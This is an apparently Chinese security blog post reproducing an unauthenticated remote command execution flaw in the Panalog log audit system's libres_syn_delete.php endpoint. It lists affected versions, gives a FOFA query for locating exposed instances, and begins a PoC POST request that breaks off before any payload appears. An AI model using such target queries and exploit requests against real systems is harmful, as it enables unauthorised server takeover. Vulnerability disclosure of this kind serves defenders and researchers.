Panalog 日志审计系统 libres_syn_delete.php 前台RCE漏洞复现
admin 阅读: 2024-03-14
| 后台-插件-广告管理-内容页头部广告(手机) |
0x01 产品简介
Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。
0x02 漏洞概述
Panalog日志审计系统 libres_syn_delete.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。
0x03 影响范围
version <= MARS r10p1Free
0x04 复现环境
FOFA:app="Panabit-Panalog"
0x05 漏洞复现
PoC
- POST /content-apply/libres_syn_delete.php HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Type: application/x-w
声明
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。
在线投稿:投稿 站长QQ:1888636
| 后台-插件-广告管理-内容页尾部广告(手机) |
